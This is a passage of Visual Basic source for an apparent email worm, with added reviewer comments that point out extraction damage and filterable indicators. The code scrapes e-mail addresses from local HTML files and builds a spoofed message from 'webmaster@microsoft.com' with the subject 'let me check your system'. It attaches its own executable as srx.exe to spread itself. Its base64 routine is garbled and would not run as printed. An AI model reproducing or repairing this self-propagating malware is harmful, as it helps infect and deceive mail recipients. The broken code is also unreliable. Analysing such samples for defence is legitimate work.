set ssfh = fso.getfolder(dir).subfolders
for each filh in ssfh
s = infht(filh.path)
listht (filh.path)
if s = "" then
s = "*@well.com"
end if
f = f & s & ";"
next
d = f
open "c:\t.txt" for append as #1
print #1, d
close #1
end sub
' Extracts e-mail link targets from the .htm/.html files directly inside dir.
' Returns the collected values joined with ";" (empty when none were found).
' Each matching file is read line by line into q; q is not cleared between
' files, so text from earlier files is scanned again. For every position where
' the 8-character window matches the marker, the characters that follow are
' copied up to the next double quote.
' NOTE(review): the marker literal as printed is shorter than the 8 characters
' it is compared with; this looks like extraction damage and is left as published.
function infht(dir)
dim mlto as string
dim fso, cfh, filh, ext, textline, q, wwww
dim j as long, cnt as long
set fso = createobject("scripting.filesystemobject")
set cfh = fso.getfolder(dir).files
for each filh in cfh
ext = fso.getextensionname(filh.path)
ext = lcase(ext)
if (ext = "htm") or (ext = "html") then
open filh.path for input as #1
do while not eof(1)
line input #1, textline
q = q & textline
loop
close #1
for j = 1 to len(q)
if mid(q, j, 8) = """" & "mailt" then
mlto = ""
cnt = 0
' Copy characters after the marker until the closing quote.
do while mid(q, j + 8 + cnt, 1) <> """"
mlto = mlto + mid(q, j + 8 + cnt, 1)
cnt = cnt + 1
loop
wwww = wwww & mlto & ";"
end if
next
end if
next
infht = wwww
end function
' Resolves a shell special-folder identifier to a file-system path.
' csidl: folder identifier passed to shgetspecialfolderlocation.
' Returns the path text up to the first NUL of a 512-character buffer when the
' lookup returns 0, otherwise an empty string. The result of
' shgetpathfromidlist itself is not checked.
private function getspecialfolder(csidl as long) as string
dim r as long
dim idl as itemidlist
dim path as string
r = shgetspecialfolderlocation(100, csidl, idl)
if r = 0 then
path$ = space$(512)
r = shgetpathfromidlist(byval idl.mkid.cb, byval path$)
getspecialfolder = left$(path, instr(path, chr$(0)) - 1)
exit function
end if
getspecialfolder = ""
end function
' Builds the message header block sent after the data command.
' Returns from, date, x-mailer, recipient, subject and MIME lines concatenated
' in that order; the date is formatted from the local clock.
' Defender view: every value here is fixed text and usable for mail filtering -
' the forged sender display name and address, the subject line, the x-mailer
' string, the "blimp" MIME boundary and the "by:" line.
' NOTE(review): the recipient header literal looks truncated by extraction.
private function hd() as string
dim fin as string, dh as string, recip as string
dim sdatenow as string, deit as string, phrom as string, topic as string, engine as string, myme as string
sdatenow = format(date, "ddd") & ", " & format(date, "dd mmm yyyy") & " " & format(time, "hh:mm:ss")
recip = "t subscribers" & vbcrlf
deit = "date:" + chr(32) + sdatenow + vbcrlf
phrom = "from: " & chr(34) & "administrators" & chr(34) & " <webmaster@microsoft.com>" + vbcrlf
topic = "subject:" + chr(32) + "let me check your system" + vbcrlf
engine = "x-mailer: mailsux9855097" + vbcrlf
myme = "mime-version: 1.0" & vbcrlf & _
"content-type: multipart/related; boundary=" & _
chr(34) & "blimp" & chr(34) & "; type=" & chr(34) & _
"text/html" & chr(34) & vbcrlf & _
"by:alcotheskaler" & vbcrlf & _
"--blimp" & vbcrlf & _
"content-type: text/html; charset=us-ascii" & vbcrlf & _
"content-transfer-encoding: 7bit" & vbcrlf
dh = phrom & deit & engine & recip & topic & myme
hd = dh
end function
' Builds the attachment section of the message.
' The attached file is the running program itself: the path is assembled from
' app.path, app.exename and ".exe" and handed to e32, then the closing
' "--blimp--" boundary is appended. This is the self-propagation step.
private function a12() as string
dim fin as string
dim phile as string
dim ss as string
ss = app.path
if right(ss,1) <> "\" then ss = ss & "\"
fin = fin & e32(ss & app.exename & ".exe")
fin = fin & vbcrlf & "--blimp--" & vbcrlf
a12 = fin
end function
' Wraps one file as a MIME attachment part.
' vsfullpathname: path of the file whose encoded content (from b) is appended.
' Returns the boundary line, the part headers and the encoded body.
' The attachment is always presented under the fixed name srx.exe, regardless
' of the real file name - a usable mail-gateway indicator.
' NOTE(review): the transfer-encoding value looks truncated by extraction.
public function e32(byval vsfullpathname as string) as string
dim fin as string
fin = vbcrlf & "--blimp" & vbnewline
fin = fin & "content-type: application/octet-stream; name=" & chr(34) & "srx.exe" & chr(34) & vbnewline
fin = fin & "content-transfer-encoding: base" & vbnewline
fin = fin & "content-disposition: attachment; filename=" & chr(34) & "srx.exe" & chr(34) & vbnewline
fin = fin & b(vsfullpathname)
e32 = fin
end function
' Encodes the file vsfullpathname as text for the attachment body.
' Reads the file in binary mode three bytes at a time, maps each group to four
' characters from basetab, and pads a trailing group of one or two bytes with
' "=" characters; completed lines are accumulated in sresult.
' NOTE(review): this function is not valid as printed. Several numeric literals
' are missing, comment markers in front of explanatory text were lost, the
' lookup table was lower-cased along with the rest of the listing, and a local
' variable shares the function's name. It is kept exactly as published.
public function b(byval vsfullpathname as string) as string
dim b as integer
dim basetab as variant
dim bin(3) as byte
dim s as string
dim l as long
dim i as long
dim filein as long
dim sresult as string
dim n as long
basetab = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")
erase bin
l = 0: i = 0: filein = 0: b = 0:
s = ""
filein = freefile
open vsfullpathname for binary as filein
sresult = s & vbcrlf
s = ""
' l is the file length rounded down to a multiple of three.
l = lof(filein) - (lof(filein) mod 3)
for i = 1 to l step 3
get filein, , bin(0)
get filein, , bin(1)
get filein, , bin(2)
if len(s) > then
s = s & vbcrlf
sresult = sresult & s
s = ""
end if
b = (bin(n) \ 4) and &h3f
s = s & basetab(b)
b = ((bin(n) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
b = ((bin(n + 1) and &hf) * 4) or ((bin(2) \ ) and &h3)
s = s & basetab(b)
b = bin(n + 2) and &h3f
s = s & basetab(b)
next i
' Trailing one or two bytes that did not fill a three-byte group.
if not (lof(filein) mod 3 = 0) then
for i = 1 to (lof(filein) mod 3)
get filein, , bin(i - 1)
next i
if (lof(filein) mod 3) = 2 then
b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)
s = s & basetab(b)
b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
b = ((bin(1) and &hf) * 4) or ((bin(2) \ ) and &h3)
s = s & basetab(b)
s = s & "="
else
b = (bin(0) \ 4) and &h3f right shift 2 bits (&h3f=111111b)
s = s & basetab(b)
b = ((bin(0) and &h3) * 16) or ((bin(1) \ 16) and &hf)
s = s & basetab(b)
s = s & "=="
end if
end if
if s <> "" then
s = s & vbcrlf
sresult = sresult & s
end if
s = ""
close filein
b = sresult
end function